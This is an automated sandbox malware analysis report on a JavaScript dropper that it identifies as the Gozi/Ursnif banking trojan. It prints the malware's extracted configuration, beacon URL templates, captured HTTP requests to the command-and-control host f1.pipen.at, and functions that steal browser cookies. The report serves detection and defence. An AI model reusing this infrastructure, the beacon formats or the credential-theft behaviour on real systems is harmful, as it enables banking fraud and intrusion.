
Analysis Report job_attach_t9o.js

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 224563
Start date: 22.04.2020
Start time: 19:51:31
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 49s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: job_attach_t9o.js
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name: Without Instrumentation
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winJS@19/18@4/1
EGA Information:
  • Successful, ratio: 66.7%
HDC Information:
  • Successful, ratio: 4.8% (good quality ratio 4.4%)
  • Quality average: 78%
  • Quality standard deviation: 28.5%
HCA Information:
  • Successful, ratio: 85%
  • Number of executed functions: 128
  • Number of non-executed functions: 262
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, ielowutil.exe, WMIADAP.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 2.20.142.209, 2.20.142.210, 23.61.218.119, 152.199.19.161
  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, go.microsoft.com.edgekey.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 4872 because there are no executed functions
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | false | | Gozi Ursnif | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false | Confidence


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1 | Windows Management Instrumentation2 | Valid Accounts1 | Valid Accounts1 | Scripting12 | Credential Dumping | System Time Discovery1 | Remote File Copy3 | Email Collection1 | Data Encrypted1 | Remote File Copy3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | PowerShell1 | Port Monitors | Access Token Manipulation1 | Obfuscated Files or Information2 | Network Sniffing | Account Discovery1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Scripting12 | Accessibility Features | Process Injection513 | Masquerading11 | Input Capture | Security Software Discovery1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Execution through API3 | System Firmware | DLL Search Order Hijacking | Valid Accounts1 | Credentials in Files | File and Directory Discovery3 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol3 | SIM Card Swap | | Premium SMS Toll Fraud
Exploit Public-Facing Application | Exploitation for Client Execution1 | Shortcut Modification | File System Permissions Weakness | Virtualization/Sandbox Evasion2 | Account Manipulation | System Information Discovery45 | Shared Webroot | Data Staged | Scheduled Transfer | Connection Proxy1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface1 | Modify Existing Service | New Service | Access Token Manipulation1 | Brute Force | Virtualization/Sandbox Evasion2 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | | Abuse Accessibility Features
Spearphishing Attachment | Command-Line Interface12 | Path Interception | Scheduled Task | Process Injection513 | Two-Factor Authentication Interception | Process Discovery3 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | DLL Side-Loading1 | Bash History | Application Window Discovery1 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Connection Proxy1 | Input Prompt | System Owner/User Discovery1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | | Data Destruction

Signature Overview



AV Detection:

Found malware configuration
Source: regsvr32.exe.3064.4.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "318", "system": "1ce5daae129a99d4ae35102f58b42ad9hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1587610402", "user": "31b341dd54c8a3b79c4b2eb50a222cb3", "hash": "0x0d8e127a", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: f1.pipen.at | Virustotal: Detection: 6%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ZyQNToG.txt | Joe Sandbox ML: detected

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_004D7EE6 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_004D7EE6
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_04AB940E
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AACDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,4_2_04AACDF2
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AA8181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,4_2_04AA8181
Contains functionality to query local drives
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB7CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,4_2_04AB7CDC

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: regsvr32.exe, 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp | String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: regsvr32.exe, 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /api1/igWBhEmvOe/UIhCLtvNNXA3Dhj_2/FDj_2FhLMSjk/G2Mw_2BTqcj/WegL_2FTjWSGj_/2FQ7v9chL1T5gjSYxJAiY/_2Bo30CBK7VKTcdT/u_2Fo3Lwwjidq6f/gkat_2BzUqBrDmvBc_/2FtyT2dtZ/vQHbB_2Be_2BAAG7pJhi/C15rCUYZlIEsxrMCoAm/FKbt_2BLCFWhZNCd_2BPnU/gcbG1zc0ODs_2/BGWoM9Vl/1aKCqNIzIN_2F0QMkCtmkqB/SzEBLowGkq/ovuWPakyr_2Bx9RSH/r_2Bla4aiW1_/0A_0DGRCCTm/J4coQX1Gvn4zEH/ZAf_2FUNzBlZHtdDG94Ky/lcDJ5YoBo5c_2FBW/jWsyzscpN/jENWu6 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/nMsAh3YXAYzJDAiL4Z/e_2BLHmGu/54qdcInbRmYcAGNG6OmQ/qFgtvTMg144czR9IiDf/IaNYGuavmX1oVVv0Qa_2BQ/VObzIpbd975it/gn4L_2Ft/gFwgJD2AlQQWrL4a97_2BXd/EuMy3IhIJa/7K1g0HkYfMM9S08Ve/3nzA4MqygIUp/rbS7jXMb1bX/fusyDtiAk_2B3T/BV6_2B0pzOB4j70XHHHM6/wp7YGpsRw_2FNWVQ/9bG5DkfOvjWhJc0/0SrCcVEbG_2FdVBgvK/H9_0A_0Dl/hYEyuXO4zy2QT1bk0e6m/6hy0kjdWltkg_2Fvkdg/2HH3Qi02z39s1MX8m4U46E/z2hRqWc7 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/SwlOID5x_2/BfdmKd57Yhi_2BOMV/5FAIlkI_2BNq/zR_2F68jXiN/7BcXkZyyMtb6cV/r_2BfHQUgvzhsbFnmW1T3/xaxNPV4No_2FqUl5/fcpGTLzM6ohz3RR/eJMP_2BCja480ogUBM/9WsZ4Dp9k/KZWwvWd8PiRwLrQ_2Bbs/yv5rQuy_2BmPOAf5kSL/sEBoaXlGTv_2Bv2q5eC9Nc/0F119tcQRA0Y5/v9SWUo_2/FSPcKYiRRapd_2BMCIzbDAy/voyGRshx88/4X6pYNySka17rDA0n/j_0A_0DI3k4t/cShpyQHdKW_/2FWYRUw5WG4RJ0/78sEkUxauCKfeGP7kjzyd/tYj2AF6SYZdqV/vFgR8z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Found strings which match to known social media urls
Source: msapplication.xml0.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6bc36459,0x01d6191a</date><accdate>0x6bc36459,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6bc36459,0x01d6191a</date><accdate>0x6bc36459,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6bcb2260,0x01d6191a</date><accdate>0x6bcb2260,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6bcb2260,0x01d6191a</date><accdate>0x6bcb2260,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6bcdad39,0x01d6191a</date><accdate>0x6bcdad39,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6bcdad39,0x01d6191a</date><accdate>0x6bcdad39,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: f1.pipen.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 Apr 2020 17:53:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Urls found in memory or binary data
Source: regsvr32.exe, control.exe, 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, control.exe, 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: regsvr32.exe, 00000003.00000002.1231089131.0000000001840000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1233989902.0000000002D40000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.1277361914.000001C7C6990000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1256681400.0000000001170000.00000002.00000001.sdmp | String found in binary or memory: http://f1.pipen.at/api1/SwlOID5x_2/BfdmKd57Yhi_2BOMV/5FAIlkI_2BNq/zR_2F68jXiN/7BcXkZyyMtb6cV/r_
Source: explorer.exe, 00000010.00000000.1238599229.0000000007C26000.00000004.00000001.sdmp | String found in binary or memory: http://f1.pipen.at/api1/SwlOID5x_2/BfdmKd57Yhi_2BOMV/5FAIlkI_2BNq/zR_2F68jXiN/7BcXkZyyMtb6cV/r_2BfHQ
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: regsvr32.exe, 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, regsvr32.exe, 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, control.exe, 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: msapplication.xml.7.dr | String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000010.00000002.1272924871.0000000007A37000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: msapplication.xml1.7.dr | String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: msapplication.xml2.7.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.7.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.7.dr | String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: msapplication.xml5.7.dr | String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: msapplication.xml6.7.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.7.dr | String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1064584505.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1107254349.0000000004D5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064674452.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064703086.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064524352.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064632588.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064218194.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1276679333.000000000033E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064435714.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064335431.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3064, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 4740, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff4_2_04ABFB8F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie4_2_04ABFB8F
Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1064584505.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1107254349.0000000004D5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064674452.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064703086.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064524352.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064632588.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064218194.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1276679333.000000000033E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064435714.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064335431.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3064, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 4740, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
